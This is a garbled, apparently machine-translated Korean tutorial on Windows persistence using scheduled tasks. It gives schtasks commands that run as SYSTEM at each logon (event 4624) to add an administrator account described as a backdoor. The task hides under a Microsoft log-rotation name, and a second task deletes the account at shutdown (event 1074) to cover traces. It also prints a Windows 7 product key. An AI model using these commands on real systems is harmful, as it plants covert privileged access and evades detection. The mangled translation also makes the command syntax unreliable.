첫째, 작업이 필요
시작을 설계하려면, 종료 이벤트는 달성하기 위해 작업 트리거 조건을 일정 :
1, 새로운 사용자 부팅
2, 종료시 사용자를 삭제
둘째, 해결 단계
(A) 테스트 환경을 구축하기
명령 이벤트가 트리거됩니다 Schtasks는 .
사용 Schtasks는 주요 기능은 완료 : 트리거 로그 이벤트의 사용을 결정하기 위해 인터넷 사용자의 새로운 관리자 계정을 달성하기 위해, 명령을.
기존 사용하는 경우 에 명령, 우선 여러 명령 행을 수행 할 필요가 다음 이벤트 로그에 의해 유발 될 수 없다, 그들은 단지에 기록 될 수 .BAT 배치 파일 처리 .
이벤트 트리거를 사용하기 때문에, XP는 새로운 만들 수 있으므로,이 기능이없는 WIN7 가상 머신을.
WIN7의 에 대한 활성 키 YKHFT KW986 GK4PY FDWYH 7TP9F
(B) 사용자가 생성하는 전력
Schtasks는의 사용 설명 :
이 관리자는 로컬 또는 원격 시스템에 어떤 계획을 생성, 쿼리, 변경, 실행을 삭제하고 중지 할 수 있습니다
서비스.
매개 변수 목록 :
/ 만들기 새 예약 된 작업을 만듭니다.
/ 삭제 예약 된 작업을 삭제합니다.
/ 쿼리는 모든 예약 된 작업을 표시합니다.
/ 변경은 예약 된 작업의 속성을 변경합니다.
/ 실행 요구 예약 된 작업에서 실행됩니다.
/ 종료는 현재 실행중인 예약 된 작업을 중단합니다.
/ ShowSid 적절한 보안 식별자를 계획하는 작업의 이름을 표시합니다.
/? 이 도움말 메시지를 표시합니다.
예를 들면 :
Schtasks는
Schtasks는 /?
Schtasks는 / 실행 /?
Schtasks는 / 종료 /?
Schtasks는 / 만들기 /?
Schtasks는 / 삭제 /?
Schtasks는 / 쿼리 /?
Schtasks는 / 변경 /?
Schtasks는 / ShowSid /?
이벤트 부트 이벤트 ID는 이다 4624 , 그래서 다음과 같이 코드는 다음과 같습니다
Schtasks는 / / TN을 만들 "마이크로 소프트 \ 윈도우 \ LocalEventLogRotate"/ TR "\"cmd.exe를의 \ "/ K 순 사용자 CYX CYX / 추가 / Y / 활성 : 예 >> NUL 및 그물 localgroup을 관리자 CYX / 추가> NUL 및 순 사용자 CYX / 코멘트 : \ "기본 제공 계정 네트워크 빨판을 백도어에 대한 \"> NUL 및 종료 "/ F / RU 시스템 / EC 보안 / SC의 onEvent / 월"* [시스템 [제공자 [이름 = '마이크로 소프트 윈도우 @ - 보안 - 감사 '] 및 이벤트 ID = 4624] "
이 코드 행은 명령 줄 창에서 직접 입력 할 수 있습니다.
윈도우가 로그인 할 때 계정이 삭제되지 않은 경우 종료하기 때문에, 다시 시작합니다.
(C) 오프 사용자 삭제
문의 종료 이벤트시 ID 입니다 1074 .
다음과 같이 코드입니다 :
Schtasks는 / / TN "마이크로 소프트 \ 윈도우 \ LocalEventLog"/ TR "\"cmd.exe를의 \ "/ K 순 사용자 레몬 / 델> NUL 및 종료"/ F / RU 시스템 / SC의 onEvent / EC 시스템 / 월 "*을 만들 시스템 [이벤트 ID = 1,074] "
먼저 계정을 종료하기 전에 상황을 확인
다시 시작 후, 아래의 결과로, 계정이 삭제되었습니다.
전원을 켜면, 다음을 입력 NET에게 사용자를 성공적으로 시작이 설립 된 후 계정을 볼 수 있습니다.
